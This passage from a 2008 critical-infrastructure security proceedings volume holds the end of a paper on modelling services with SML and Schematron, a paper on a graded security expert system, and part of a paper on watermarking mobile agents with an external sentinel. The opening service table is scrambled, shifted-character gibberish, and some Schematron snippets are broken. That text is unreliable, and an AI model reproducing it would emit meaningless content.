5DGLXVBVHUYHUBYDOLGDWLRQ569 WKLVKLJKOHYHOVHUYLFHWDNHVDVLQSXWWKHGDWDUHFHLYHGE\WKH5V55VHUYLFHDQGYDOLGDWH 56/$ WKHORJLQDQGSDVVZRUGRIWKHXVHU,WVLVPDQGDWRU\IRUWKH533&VHUYLFH 5DGLXVB6HUYHUB'HFU\SWLRQ VXFKORZOHYHOVHUYLFHLVXVHGE\WKH569LQRUGHUWRYHULI\WKHDXWKHQWLFLW\RIWKH 5DGLXVB6HUYHUB'HFU\SWLRQ UHFHLYHGSDFNHWVDQGWRGHFU\SWWKHLUFRQWHQW$GLVVHUYLFHDWWKLVOHYHOLPSDFWGLUHFWO\ 56' WKH569VHUYLFH VXFKVHUYLFHWDNHVWKHGHFU\SWHGSDFNHWVDQGVHQGVWKHPIRUYDOLGDWLRQWRWKHZLQGRZV 5DGLXVB6HYHUBORJLQBDXWKHQWLF GRPDLQVHUYHU,WXVHVWKHORFDOBFRQQHFWLRQVHUYLFHDQGWKH'16VHUYLFH$GLVVHUYLFH DWLRQ56/$ RIRQHRIWKHVHWZRORZOHYHOVHUYLFHVZLOOFRPSURPLVHWKH56/$ VXFKVHUYLFHUHFHLYHDUHTXHVWIURPWKHUDGLXVVHUYHUFRQWDLQLQJWKHXVHUFUHGHQWLDOVWR :LQBGRPDLQBDXWKHQWLFDWLRQ EHYDOLGDWHGFKHFNLQLWVDFWLYHGLUHFWRU\GDWDEDVHDQGVHQGEDFNWRWKHUDGLXVVHUYHU :'$ WKHUHVXOWVRIWKHYDOLGDWLRQ,IWKHYDOLGDWLRQLVSRVLWLYHLW³YLUWXDOO\´ UHPRWHFOLHQWDOOWKHLQIRUPDWLRQUHTXLUHGLQRUGHUWRSURSHUO\VHWXSWKHUHPRWH 5DGLXV6HUYHUFRQQHFWLRQ FRQQHFWLRQDQGWKHYLUWXDO³GRPDLQH[WHQVLRQ´6XFKVHUYLFHUHTXLUHVLQRUGHUWRZRUN VHWXS56&6 SURSHU
$VVRFLDWHWRWKH 6HUYLFH1RGH
/RFDOBFRQQHFWLRQBVHUYLFH '16
5DGLXV6HUYHU
5DGLXV6HUYHU
5DGLXV6HUYHU
/RFDOBFRQQHFWLRQBVHUYLFH '16$FWLYHB'LUHFWRU\
:LQ'RPDLQ6HUYHU
5RXWLQJ6HUYLFH'16
5DGLXV6HUYHU
5HPRWHBFOLHQWBSDUDPHWHUVBV VXFKVHUYLFHUHFHLYHVDVLQSXWDSURSHULQIRUPDWLRQWRNHQIURPWKH56&6DQGFRQILJXUHV HWXS SURSHUO\WKHUHPRWHFOLHQW,WVIDLOXUHGLUHFO\LPSDFWRQWKH533&VHUYLFH
5DGLXV6HUYHU
(QHUJ\BVHUYLFH
LVWKHORFDOVHUYLFHQHHGHGE\HYHU\GHYLFHLQRUGHUWRZRUN$OOWKHGHYLFHVLQYROYHGLQ WKHDQDO\]HGGLVWULEXWHGV\VWHPQHHGVXFKVHUYLFH
/RFDOBFRQQHFWLRQBVHUYLFH
LWLVWKHVHUYLFHSURYLGLQJWKHEDVLFORFDOQHWZRUNFRQQHFWLRQSURYLGHGE\WKHORFDO VZLWFKHVURXWHUVDQGJDWHZD\ 1HHGHGIRUDOOWKHFOLHQWVVHUYHUFRPPXQLFDWLRQV
'166HUYLFH
LWVSUHVHQFHLVQHHGHGLIWKH5DGLXVFOLHQWKDVDPQHPRQLFQDPHRWKHUZLVHLILWLV DFFHVVHGWKURXJKWKHVSHFLILFDWLRQRILWVLSDGGUHVVLWLVQRWYLWDOIRUWKH533&VHUYLFH
/RFDOBFRQQHFWLRQBVHUYLFH
$OOVHUYLFHQRGHV
5RXWLQJVHUYLFH
VXFKVHUYLFHSURYLGHGE\WKHURXWHUVRYHUWKHSXEOLFQHWZRUNDOORZVWRURXWHWKHSDFNHW WRWKHSURSHUGHVWLQDWLRQ,WVIDLOXUHFRPSOHWHO\FRPSURPLVHWKH533&VHUYLFH /RFDOBFRQQHFWLRQBVHUYLFH
$OOVHUYLFHQRGHV
$OOVHUYLFHQRGHV
$OOVHUYLFHQRGHV
Fig. 2. Service Nodes and Services
Each element and service is defined by an unique URI Id, In the URI are defined the values for each attribute, including the provided services defined in the table. $RADIUS Server$ $<Status>Active$ $ $ $ $ $ $<Service sml:uri=’/PowerPlant/IT/Services/RSRR.xml’> $<Service sml:uri=’/PowerPlant/IT/Services/RSD.xml’> $<Service sml:uri=’/PowerPlant/IT/Services/RSLA.xml’> $<Service sml:uri=’/PowerPlant/IT/Services/RSV.xml’> $
In turn, the URI of the services are defined. Because of the pages requirement on this article, only one example of Service URI is provided. The others can be defined in a similar way:
276
G. Baldini and I.N. Fovino
$RCRD$ $<Status>Active$ $ $<Service sml:uri=’/PowerPlant/IT/Services/RSD.xml’> $<Service sml:uri=’/PowerPlant/IT/Services/RSLA.xml’> $<Service sml:uri=’/PowerPlant/IT/Services/RSV.xml’> $
Through the services dependencies, the service nodes are related because they are providers of services. We can now define a number of rules using the Schematron. For example: one simple rule is that NeededPower of the service node should be less or equal to the power provided by the PrimaryEnergyRef. This can be described in the following way: <sch:rule context="."> <sch:assert test= "NeededPower 0’ (The status is not valid is the count of Events which are present is greater than 0.)
An alternative approach is to describe the dynamic relationship among Events and Service using WS-CDL. As we described before, an important feature of a modeling language is the capability to represent the user differentiation: how the same service may have different service level agreement with different users. For example the operator end-user needs a VPN with HIGH level of security while a Basic User can have any level of security. This can be represented, using the following Schematron rule: <sch:pattern id="UsersVPNPattern"> <sch:ns prefix="u" uri="... ." /> <sch:rule context="End-Users> <sch:assert test="(@Role = ’Operator’ and UsedServices/ServiceRef/SecurityLevel = ’HIGH’) or @Role != ’Operator’">
Alternatively, we could use the WS-WSLA language to represent the Service Level Agreements (see [7]). In WS-WSLA, we have to define the involved parties (End-Users and ServiceNodes), the Service Definition (the VPN connectivity service) and the Obligations (that the Operator needs the VPN with HIGH security). Parties and services can be defined in a similar way to SML including definition of roles, extensions and other features. The obligations are defined through predicates in a similar way to the Schematron. In comparison to SML, WSWSLA provides a larger set of predefined types and metrics to evaluate the level of service level agreements. The level of trust and security in the exchange of information across service nodes can be represented using a Schematron rule or by using the WS-Policy specification (see [8]). WS-Policy allows web services to use XML to advertise their policies on security, Quality of Service and so on.
6
Future Developments
The SML representation of the real-case system, presented in this paper, could be further enriched by increasing the level of abstraction and model the entire Power Plant and its interdependencies with the Power Generation and Distribution infrastructure. As described in chapter 2, the system can be represented as a ’network’ of services, where service dependency chains could be clearly identified and formally described using SML and other W3C languages. The objective is to use the model to discover consistency gaps, vulnerability chains and provide
278
G. Baldini and I.N. Fovino
a clear definition of intra-domain and cross-domain dependencies with related service level agreements (explicitly or implicitly defined). The output will be compared with the results of similar modeling efforts to evaluate the quality of the service-oriented approach on the basis of parameters like model-reliability to infrastructure changes and evolution, identification of vulnerabilities, completeness of the representation and so on.
7
Conclusion
In the limits of the allowed space, the purpose of the paper was to present the service modeling approach to represent critical infrastructures and how SML and related W3C languages can be used to support this approach. This approach can be used to model even very large infrastructures by selecting the proper level of abstraction. The model can be expanded incrementally as built-in validation rules and constraints will ensure the integrity of the representation at any iteration. W3C languages like SML are also evolving and expanding and the modeling capabilities will be further enriched.
References 1. Service Modeling Language (W3C) Version 1.1 W3C Working Draft 3 March (2008), http://www.w3.org/TR/sml (last accessed August 28, 2008) 2. XML Schema Structures and Datatypes Schema 1.1., http://www.w3.org/XML/Schema (last accessed August 28, 2008) 3. ISO Schematron Version 1.5, http://www.schematron.com (last accessed August 28, 2008) 4. Calder, M., Kolberg, M., Magill, E.H.: Feature Interaction: A Critical Review and Considered Forecast. Computer Networks: The International Journal of Computer and Telecommunications Networking 41(1) (January 2003) 5. Dworack, F.S., Chow, C.H., Griffeth, N., Herman, G.E., Lin, Y.-J.: The feature interaction problem in telecommunications systems Bowen. In: Seventh International Conference on Software Engineering for Telecommunication Switching Systems, SETSS 1989, July 3-6, pp. 59–62 (1989) 6. Masera, M.: Interdependencies and Security Assessment: a Dependability view. In: Proceeding of the IEEE Conference on Systems, Man and Cybernetics, Taipei, October 8-11 (2006) 7. Web Service Level Agreement (WSLA) Language Specification version 1.0, http://researchweb.watson.ibm.com/wsla (last accessed August 28, 2008) 8. Web Services Policy Specification version 1.5, http://www.w3.org/2002/ws/policy (last accessed August 28, 2008) 9. Web Services Choreography Description Language Version 1.0, http://www.w3.org/2002/ws/chor (last accessed August 28, 2008)
Graded Security Expert System J¨ uri Kivimaa1 , Andres Ojamaa2 , and Enn Tyugu2 1
Estonian Defence Forces Training and Development Centre of Communication and Information Systems, Tallinn, Estonia
[email protected] 2 Institute of Cybernetics at TUT, Tallinn, Estonia
[email protected],
[email protected] Abstract. A method for modeling graded security is presented and its application in the form of a hybrid expert system is described. The expert system enables a user to select security measures in a rational way based on the Pareto optimality computation using the dynamic programming for finding points of Pareto optimality curve. The expert system provides a rapid and fair security solution for a class of known information systems at a high comfort level.
1
Introduction
Graded security measures have been in use for a long time in the high-risk areas like nuclear waste depositories, radiation control etc. [1]. Also in cyber security, it is reasonable to apply a methodology that enables one to select rational security measures based on graded security, and taking into account the available resources, instead of using only hard security constraints prescribed by standards. It is well known that complete (100%) security of an information system is impossible to achieve even with high costs. A common practice is to prescribe the security requirements that have to be guaranteed with a sufficiently high degree of confidence for various classes of information systems. This is the approach of most security standards, e.g. [2]. However, a different approach is possible when protecting a critical information infrastructure against the cyber attacks – one may have a goal to provide the best possible defense with given amount of resources (at the same time considering the standard requirements). This approach requires a considerable amount of data that connects security measures with required resources and security measures with provided degree of security. Practically, only a coarse-grained security can be analyzed in such a way at present, using a finite number of levels (security classes) as security metrics. This is a basis of the graded security methodology. This approach has been successfully applied in the banking security practice and included at least in one security standard [3]. The ideas of graded security are based on the US Department of Energy security model from 1999 [4] and its updated version from 2006 [5]. The graded security model itself is intended for helping to determine a reasonable set of needed security measures according to security requirements levels. R. Setola and S. Geretshuber (Eds.): CRITIS 2008, LNCS 5508, pp. 279–286, 2009. c Springer-Verlag Berlin Heidelberg 2009
280
J. Kivimaa, A. Ojamaa, and E. Tyugu
However, in practice it can be the case that there are not enough resources to achieve the baseline. In this case it is still desirable to invest the limited amount of resources as effectively as possible, i.e. to find and apply an optimal set of security measures. The data required for estimating required resources and security measures can be presented in the form of expert knowledge in an extendable expert system. At present, this expert system can include at least the data that have been used in the banking security design, in particular in a branch of the Swedish bank SEB. Using an expert system has the advantage that it provides flexibility in selecting the required values for the security analysis – the values can be selected based on various input data, and even default values can be used in some non-critical places. The present paper is organized as follows: the graded security model is presented in Section 2, the optimization method for finding a Pareto optimal curve depending on available resources is described in Section 3, and Section 4 gives a brief overview of the whole software system together with a demo example of security analysis.
2
Graded Security Model
In the present section we briefly explain the basic concepts of the graded security model: security goals, classes and measures as well as costs related to the security measures. We use integrated security metrics for representing the overall security of a system. We explain the way these entities are related. Conventional goals of security are confidentiality, integrity, availability, and non-repudiation. In this presentation, that is based mainly on banking security, we use the following four slightly different security goals: confidentiality (C), integrity (I), availability (A) and satisfying mission criticality (M). (The latter two are in essence two aspects of availability.) The model can be extended by including additional security goals. A finite number of levels are introduced for each goal. At present, we use four levels 0, 1, 2, 3 for representing required security, but the number of levels can vary for different measures. The lowest level 0 denotes absence of requirements. Security class of a system is determined by security requirements that have to be satisfied. It is determined by assigning levels to goals, and is denoted by respective tuple of pairs, e.g. C2I1A1M2 for the system that has second level of confidentiality C, first level of integrity I etc. To achieve the security goals, some security measures have to be taken. There may be a large number of measures. It is reasonable to group them into security measures groups. Let us use the following nine groups in our simplified examples which are based on an educational information assurance video game CyberProtect [6]: user training (1), antivirus software (2), segmentation (3), redundancy (4), backup (5), firewall (6), access control (7), intrusion detection (8), and encryption (9). The number of possible combinations of security levels for all security goals is 44 = 256. This is the number of different security classes in our case, see
Graded Security Expert System
281
Fig. 1. Security classes of graded security model
Fig. 1. A security class determines required security levels for each group of security measures. Abstract security profile is an assignment of security levels (0, 1, 2 or 3) to each group of security measures. Hence, in the present example, we have totally 49 = 2621144 abstract security profiles to be considered. The number of security measures groups may be larger in practice, e.g. 20. This gives a big number of abstract security profiles – 420 for 20 groups. Knowing the costs required for implementing security measures of any possible level, one can calculate the costs of implementing a given abstract security profile. After selecting security levels for a security measures group, one can find a set of concrete measures to be taken. This information is kept in the knowledge modules of the expert system of security measures, see Section 4. It is assumed that, applying security measures, one achieves security goals with some confidence. The security confidence li is described by a numeric value between 0 and 100 for each group of security measures i = 1, . . . , n, where n is the number of groups. We describe overall security of a system by means of an integrated security metrics – the security is evaluated by weighted mean security confidence S: S=
n
ai li ,
i=1
where li is security confidence of i-th security measures group, ai is a weight of the i-th group, i = 1, . . . , n, and n
ai = 1 .
i=1
Information about costs, required security measures and confidence levels needed for calculations is presented in the expert system that will be described in Section 4. Graded security methodology as it is generally accepted, enables one to find required security measures and costs for a given security class. We add also the value of weighted mean security confidence S. Fig. 2(a) shows a usual graded security solution: the value of S for given resources r, and also selected security levels of security measures groups. The levels for the groups numbered from 1 to 9 are shown on the right side scale.
282
3
J. Kivimaa, A. Ojamaa, and E. Tyugu
Optimization Technique
Our expert system allows us to solve several security related optimization problems. First of all, it enables one to find an optimal security solution for given resources, and to determine the reachable security class. This problem concerns again only one value of resources, and can be illustrated by the same picture as the conventional graded security problem (Fig. 2(a)). To get a broader view of possible solutions, one should look at the optimal security for many different values of usable resources. This service is provided by our expert system by plotting a Pareto optimality tradeoff curve that binds resources and the achievable security S. Fig. 2(b) shows this curve for an interval of resources from r1 to r2 . The last value of resources r2 can be easily calculated as the resources required for getting the security class C4I4A4M4. The curve shows also the respective security levels for selected security measures groups – in the present case, for the groups number 1 and 4. The exhaustive search of optimal solutions for q possible values of resources, n security measures groups and k security levels requires testing (calculating weighted mean confidence) of qk n points. Building optimal solutions gradually, for 1, 2, . . . , n security measures groups enables us to use discrete dynamic programming, and to reduce considerably the search. Indeed, the fitness function S defined on intervals from i to j as S(i, j) =
j
as ls
s=i
is additive on the intervals, because from the definition of the function S we have S(1, n) = S(1, s) + S(s, n), 1 < s < n . This means that one can build an optimal resource assignment to security measures groups gradually, as a path in the space with coordinates x1 , x2 , where x1 equals to the number of security measures groups that have got resource (i.e. S
l
S
l
S* 5, 7
3
1, 2, 3, 6, 8, 9
2
4
2 1
1 0
4 r*
(a) Conventional solution
graded
r security
3
r1
r2
1 0
r
(b) Pareto-optimal solutions
Fig. 2. Conventional graded security solution and Pareto optimality tradeoff curve
Graded Security Expert System
283
x1 = s) and x2 equals to the amount of used units of resources. This algorithm requires testing of q 2 nk points (q is number of possible values of resources, n is number of security measures groups and k is number of security levels).
4
Security Expert System
A hybrid expert system with visual specification language for security system description has been built on the basis of a visual programming environment CoCoViLa [7]. The system includes knowledge modules (rule sets) in the form of decision tables for handling expert knowledge of costs and gains, as well as for selecting security measures for each security group depending on the required security level. Other components are an optimization program for calculation Pareto optimality curve parameterized by available resources, and a visual user interface for graphical specification of the secured system, visual control of the solution process through a GUI, and visualization of the results. These components are connected through a visual composer that builds a Java program for each optimization problem, compiles and runs it on the request of the user, see Fig. 3. Let us explain the usage of the expert system on the following simplified example. We have nine security measures groups as given in Section 2. Two groups – “user training” and “encryption” – have specific values of cost and confidence related to security levels that must be given as an input. We can use standard values of cost and confidence given in the expert knowledge modules for other groups. We have to solve the problem in the context of banking and can use resources measured in some units on the interval from 1 to 70. The security class C2I1A1M2 is given as an input. The expected outcome is a graph that shows the weighted mean security confidence depending on the resources that are used in the best possible way. The graph should also indicate whether the security goals specified by the security class can be achieved with the given amount of resources. Besides that, the curves showing security confidence provided by user training and redundancy must be shown. The visual composer is provided by the CoCoViLa system that supports visual model-based software composition. The main window of the expert system shown in Fig. 4 presents a complete description of the given problem. It includes also visual images of components of the expert system and a toolbar for Knowledge modules
Optimizer
GUI
Vi
Visual composer
Fig. 3. Graded security expert system
284
J. Kivimaa, A. Ojamaa, and E. Tyugu
Fig. 4. Problem specification window
adding new components, if needed. In particular, new security measures groups can be added by using the third and fourth button of the toolbar. Besides the security measures groups there are three components – Optimizer, SecClass and GraphVisualizer – shown in the window. The components in the main window can be explicitly connected through ports. This allows us to show which values of security should be visualized (“user training” and “redundancy” in the present case) etc. There are extended views of two security measures groups – “user training” and “encryption” that have explicit values of costs and confidence given as an input. Other groups use the standard values of costs and confidence given in the expert knowledge modules as specified in the problem description. The SecClass component is used for specifying security goals. During computations, this component also evaluates the abstract security profiles calculated by the Optimizer against the actual security requirements using a knowledge module from the expert system.
5
Optimization Results
As an example, in Fig. 5 there is a window showing the optimization results. The upper curve (Confidence) represents the optimal value of weighted mean security confidence depending on the resources that are used in the best possible way. This curve is further divided into four parts to visualize to which degree the optimal result satisfies the security requirements given by the security class. The first part (black line) indicates the interval of resources where none of the four (in our example) security goals can be achieved. The second part (grey line, three separate segments) shows that at least one of the security goals is satisfied while also at least one is not. The third part (thick black line) represents the amount of resources that, when used optimally, would result in satisfying the requirements exactly. One should note that this coincidence of the optimal security profile and
Graded Security Expert System
285
Fig. 5. Solutions window
the security requirements does not always exist. The last part of the graph (black line, again) shows the amounts of resources that are more than is strictly needed to satisfy the requirements. It is interesting to notice that on the interval of costs from 36 to 45 units it is possible to satisfy all security goals, because already spending 34 units enables one to do this. However, the solutions with highest values of the weighted mean security confidence do not satisfy all security goals on this interval. The lower graphs indicate (on the right scale) the optimal levels of two measures groups corresponding to the given amount of resources. These graphs are not necessarily monotonic as can be seen in this example at the resource values 35 and 36. When there are 35 units of resources available it is reasonable to apply the measure “user training” at level 2. Having one more unit of resources better overall security confidence level is achieved by taking all resources away from “user training” and investing into the “redundancy” measures group to achieve level 3.
6
Conclusions
The advantage of the expert system of the graded security is that it provides a rapid security solution at a sufficiently high, although not 100%, confidence level. Based on our previous experience, the graded security expert system allows a typical security solution to be developed within approximately 8 hours, with about half the time spent on security class identification and the other half on manually analyzing available resources, accepted security risks, attack costs and other optimization variables. Our method reduces the time for analysis to a few seconds by automatic optimization and presenting a global view in the form of a Pareto optimal solution. It includes:
286
J. Kivimaa, A. Ojamaa, and E. Tyugu
– graded security selection procedure that yields the security measures for a given security class; – high-level analysis of usage of resources for information security and accepted risks based on advanced optimization technique. We understand that wider application of this method will depend on the availability of expert knowledge that binds costs and security confidence values with taken security measures. This knowledge can be collected only gradually, and will depend on the type of the critical infrastructure that must be protected. Acknowledgements. We thank the Estonian Ministry of Defence and the Estonian Defence Forces Training and Development Centre of Communication and Information Systems for the support of this work. The contribution of the second author was partially supported by the Estonian Information Technology Foundation and the Tiger University program.
References 1. Kang, Y., Jeong, C. H., Kim, D. I.: Regulatory approach on digital security of instrumentation, control and information systems in nuclear power plants. Korea Institute of Nuclear Safety. Daejeon, Korea, http://entrac.iaea.org/IandC/TM IDAHO 2006/CD/ IAEA%20Day%202/Kang%20paper.pdf (August 31, 2008) 2. German Federal Office for Information Security (BSI): IT Baseline Protection Manual (2005), http://www.bsi.de/gshb/ (August 31, 2008) 3. Estonian Information Systems Three-Level Security Baseline System – ISKE ver. 1.0 4. U. S. Department of Energy, Office of Security Affairs: Classified Information Systems Security Manual (1999) 5. U. S. Department of Defense: National Industrial Security Program Operating Manual (NISPOM) (2006) 6. U. S. Department of Defense, Defense Information Systems Agency. CyberProtect, version 1.1 (July 1999), http://iase.disa.mil/eta/product_description.pdf (August 31, 2008) 7. Grigorenko, P., Saabas, A., Tyugu, E.: Visual tool for generative programming. ACM SIGSOFT Software Engineering Notes 30(5), 249–252 (2005)
Protection of Mobile Agents Execution Using a Modified Self-Validating Branch-Based Software Watermarking with External Sentinel Joan Tom`as-Buliart1 , Marcel Fern´andez1, and Miguel Soriano1,2, 1
2
Department of Telematics Engineering, Universitat Polit`ecnica de Catalunya, C/ Jordi Girona 1 i 3, Campus Nord, Mod C3, UPC, 08034 Barcelona, Spain CTTC: Centre Tecnol`ogic de Telecomunicacions de Catalunya Parc Mediterrani de la Tecnologia (PMT), Av. Canal Ol´ımpic S/N, 08860 - Castelldefels, Barcelona, Spain {jtomas,marcel,soriano}@entel.upc.edu
Abstract. Critical infrastructures are usually controlled by software entities. To monitor the well-function of these entities, a solution based in the use of mobile agents is proposed. Some proposals to detect modifications of mobile agents, as digital signature of code, exist but they are oriented to protect software against modification or to verify that an agent have been executed correctly. The aim of our proposal is to guarantee that the software is being executed correctly by a non trusted host. The way proposed to achieve this objective is by the improvement of the Self-Validating Branch-Based Software Watermarking by Myles et al.. The proposed modification is the incorporation of an external element called sentinel which controls branch targets. This technique applied in mobile agents can guarantee the correct operation of an agent or, at least, can detect suspicious behaviours of a malicious host during the execution of the agent instead of detecting when the execution of the agent have finished.
1 Introduction Nowadays, most of the critical infrastructures are controlled by software entities. Usually, these systems must have an accurate exactitude but, what happens when these systems are compromised? Some mechanisms are applied in order to protect or increase the security level of these kinds of infrastructures. Commonly used systems like firewalls, intrusion detection systems, honeypots or honeynets,. . . are useful to detect and counteract security incidents but, these methods are as necessary as the systems which control that these security systems work correctly. It seems logical that these systems must be monitored. The logs were the first tools typically used to monitor systems but its have turned a slow and not enough on-line monitoring system. Over last years, the systems based on alerts have been presented as the alternative because its can detect anomalies in the systems and send an alert to the central control to inform the manager. In this scenario, mobile agents can be a good solution because its use implies low
This work has been supported partially by the Spanish Research Council (CICYT) Project TSI2005-07293-C02-01 (SECONNET), by the Spanish Ministry of Science and Education with CONSOLIDER CSD2007-00004 (ARES) and by Generalitat de Catalunya with the grant 2005 SGR 01015 to consolidated research groups.
R. Setola and S. Geretshuber (Eds.): CRITIS 2008, LNCS 5508, pp. 287–294, 2009. c Springer-Verlag Berlin Heidelberg 2009
288
J. Tom`as-Buliart, M. Fern´andez, and M. Soriano
resources wasting from the point of view of central control since it is the monitored system which provides these resources. In other words, an agent is sent to a critical infrastructure to control the software which manages this infrastructure. If there are not security incidents, the agent will not send information to central control and, as a consequence, it will not spend bandwidth or CPU time of this central control. Otherwise, if some security incident is detected by the agent, it will send the relevant information about the security incident to central control. Since the idea of mobile agents appeared, some related security challenges have arisen. These security challenges can be basically divided into 2 major groups: how to protect a host from a malicious agent and how to protect an agent from a malicious host. Some proposals try to solve the first problem. In this case, these proposals guarantee that the agent which will be executed is the agent which the host thinks. In other words, these are a priori security systems. On the other hand, the proposals which try to solve the second problem are a posteriori protection system. That is to say, these systems are methods which can use the origin host to verify that the host which have been executed the agent have been proceed honestly. The aim of the system presented in this paper is to guarantee the well-function of an agent in a malicious host or, at least, to detect that something is adulterating the normal operation of this agent. But this detection is done while the agent is being executed by the malicious host. The technique presented is based in an original use of watermarking mechanism and the use of branch functions. The algorithm presented is a modification over the algorithm presented by Myles et al. in [1]. The modification proposed is the inclusion of a sentinel element which controls the targets of the branch functions. In the following section, the basis concepts are introduced. An overview about SelfValidating Branch-Based Software Watermarking by Myles et al. is showed in section 3. Section 4 explains the modifications done to protect mobile agent execution, the security analysis and some implementation aspects. Finally, some conclusions are given.
2 General Concepts Some general concepts used below will be introduced in this section. A brief explanation about how each technique is used in this proposal is also given. Software agents can be defined as software entities that migrate between hosts in order to obtain data or perform operations autonomously of user action. Taxonomy of the existent agents can be found in [2]. The main attack to mobile agent environments is performed when the host that executes the agent carries out a malicious action in order to produce a dysfunction of the agent. An other used technique is Software Watermarking. The aim of digital watermarking techniques is to embed information into any digital content. The main characteristic is that the embedded information will be imperceptible for a user of this digital content. A taxonomy of software watermarking and knew attacks is presented by Christian Collberg and Clark Thomborson in [3] and [4]. In this paper, a watermarking technique is used in order to insert information by an imperceptible mode into the code of the agent and without affect the normal behaviour of the agent. In parallel to watermarking techniques, there exist similar techniques which are known as fingerprinting techniques. The concept of fingerprinting was introduced by Wagner in [5] as a method to protect intellectual property in multimedia contents. The fingerprinting technique consists in making the copies of a digital object unique by embedding
Protection of Mobile Agents Execution
289
a different set of marks in each copy. In this paper, this technique is used in order to produce different and differentiable copies from the same agent. In this way, the agents can be reused several times by means of watermarking copies of the same agent with different fingerprints.
3 Self-Validating Branch-Based Software Watermarking by Myles et al. The algorithm presented in [1] fulfils the watermarking requirements and it also contributes with fingerprinting characteristics to the system. In other words, this algorithm can embed imperceptible authorship information in a piece of code and besides, it adds mechanisms to identify the owner of a specific copy of this piece of code. The SelfValidating Branch-Based Software Watermarking algorithm, as its name indicates, is based in the use of branch function to generate, in runtime, the appropriate fingerprint codeword. As a collateral effect of the use of this type of functions, tamper detection can be incorporated into this algorithm to detect and to disappoint attacks. This algorithm has twice different processes. The first process (equation 1) is the embedding operation (embed). This function requires 4 input parameters: the piece of code to be marked (P), Authorship mark (AM) and two secret keys, KEYAM and KEYFM . Note that, while the KEYAM is the same for all copies, each copy will have a different unique KEYFM . The aim of this function is to add the authorship mark and the fingerprint generating code into the program (P), yielding a new piece of code or program (P ) and a fingerprinting mark (FM) which is generated from KEYFM and the program execution trace. The second process (recognise) the function which can retrieve the authorship mark and the fingerprinting mark from a marked piece of code or program, the keyAM and keyFM (equation 2). Note that this algorithm has a blind recogniser, that is, marks can be retrieved without the original piece of code (P), only the marked program P and the respective keys keyAM and keyFM are needed. embed(P, AM, keyAM , keyFM ) −→ P , FM recognise P , keyAM , keyFM −→ AM, FM
(1) (2)
Fingerprint Branch Function. The branch functions [6] were created to difficult static disassembly of native executables as a basis of an obfuscation technique. Its operation is conceptually easy: some determinate jump instructions of the code are replaced by calls to the same function which will redirect these calls to the correct point in the code. Myles et al. defined a special type of branch functions that is named fingerprinting branch function (FBF). In addition to normal branch functions behaviour, this kind of function modifies the ki value every time that this function is called. This value is used to obtain the destination of the branch in each iteration. Moreover, in the last iteration, kn will take as value the fingerprinting mark FM. The aims of FBF can be schematized as follow: Verifying code integrity by obtaining, with a digest function, the value vi which will be used in the ki calculation; to generate the new ki value with one way function which depends on the values of ki−1 and vi ; transferring program execution to the original branch target using the
290
J. Tom`as-Buliart, M. Fern´andez, and M. Soriano
value of ki ; tamper detection; authorship mark is incorporated to prove ownership. As example of ki calculation, Myles et al., propose ki = SHA1[(ki−1 ⊕ AM)vi ]. Note that the integrity checks, as a tamper detection mechanisms, are capable of detecting if a program has been subjected to semantics-preserving transformation or even if a debugger is presented. Figure 1 shows a simplified schema of a tamper detection mechanism. For example, if malicious host is analysing the agent execution (inserting, for instance, breakpoints in a debugger), the checksum over a block of code will be different from the original checksum and the branch function will not be able to find the program target for this adulterated checksum. Embedding process. This process can be divided into three steps. The first step lies in running the program to be marked using as input the authorship key (keyAM ) to obtain the trace of the program. In the second step of the algorithm the branches in each function f ∈ F (where F is the set of all functions identified by trace) are substituted by calls to the FBF. The values for ki and the mapping between these values and the pointers to the next respective steps are generated. Finally, the resulting structure of the mapping is injected into the code. Note that this mapping is essential to the correct behaviour of the application. Recognition. When the program is executed taking the pertinent keys as input, the set of the functions marked by fingerprinting process and the FBF are identified. If the used one way function is known, the supposed author can demonstrate his authorship by supplying his authorship mark and comparing with the obtained mark. In the same way, as a result of the last call to FBF, the fingerprint mark is obtained.
Fig. 1. Tamper detection mechanism implemented with checksums and branch functions
4 Self-Validating Branch-Based Software Watermarking with External Sentinel Taking into account its functionality, the Fingerprinting Branch Function presented in the previous section can be divided in three different modules. ki calculator: the aim
Protection of Mobile Agents Execution
291
of this module is to calculate ki with any prefixed one-way function which involves ki−1 , vi and authorship mark AM. Mapping between the different values of ki and the pointers to next instruction to execute in the program execution flow. Execution control transferrer: This part is in charge of redirecting the program execution flow to the target instruction that is pointed out by the pointer which has been supplied by the previous mapping. In the original algorithm, these three parts were indivisible and its stayed in the same function did these three operations. These parts are differentiated and divided in this proposal. The ki calculator and the Execution control transferrer will be in the same function but the Mapping is moved from the mobile agent to another host that is named sentinel. The sentinel can be a third trusted part but it can be adapted to a hierarchical structure in a mobile agent architecture which controls critically distributed infrastructures. In this case, the sentinel is the server in charge of controlling some part of the infrastructure and it can be simultaneously audited by another mobile agent with another sentinel,. . . The main difference between the typical embedding process of Myles et al. algorithm and our embedding process is in the third step. In our modified algorithm, the mapping is not injected into the code. This information is located into the sentinel host instead of embedding it into the code. The ki calculation module is invoked when the Modified Fingerprinting Branch Function (MFBF) is called. This process is the same as the original algorithm and it must also depend on the code integrity check, the previous value of ki and the authorship mark (AM). The obtained value is used to find the next instruction in the normal execution process of the agent. This value is used by the Execution Control Transfer module to do a request to the sentinel about the pointer to the next instruction. This request is sent through a secure channel between the audited host and the sentinel. The sentinel uses the information contained in the request as the index to search in the mapping between the possible values of ki and its corresponding pointer. When the pointer is found, it is sent through the same secure channel to the Execution Control Transferrer and this module transfers execution control to the instruction indicated by the pointer. A more graphical explanation can be found in figure 2.
Fig. 2. Schema of self-validating branch-based software watermarking with external control operation
292
J. Tom`as-Buliart, M. Fern´andez, and M. Soriano
4.1 Security Analysis Note that the proposed system assumes that exists a secure channel from the monitored host to the sentinel. That is because to assume that a mobile agent can built a secure channel to an external host (the sentinel in this case) it is very unrealistic. In this way this security analysis is centred in the vulnerabilities between the secure channel and the agent, in other words, the main problems against the system proposed are generated when the host which lodges the agent makes actions in order to produce dysfunctions in the correct execution of the agent. In this way, it seems a realistic approach to consider that exist a secure channel between the monitored host and the sentinel. ki interception or modification: The ki values can be intercepted and modified by the host when the agent sends its to the sentinel. If the host only performs a passive attack, the host can not obtain any critical information from this values so ki is the result of one way function. In this case the sentinel never can detect this action. If the host performs an active attack, that is, ki value is modified by the host, the sentinel can identify this action as an attack and will start actions to punish this host or simply isolate the part of the infrastructure that depends of this agent. Returned pointer interception or modification: The returned pointer to the mobile agent from the sentinel can be intercepted or modified. The first case can not be detected by the sentinel but this action does not have dangerous consequences to the system. The modification of the returned pointer can cause a dysfunction in the agent but this dysfunction will produce an erroneous ki value or will stop the agent execution. In both cases, this action will be detected by the sentinel with the new request from the agent or by an execution time control system like proposed in [7] or in [8]. On the other hand, the 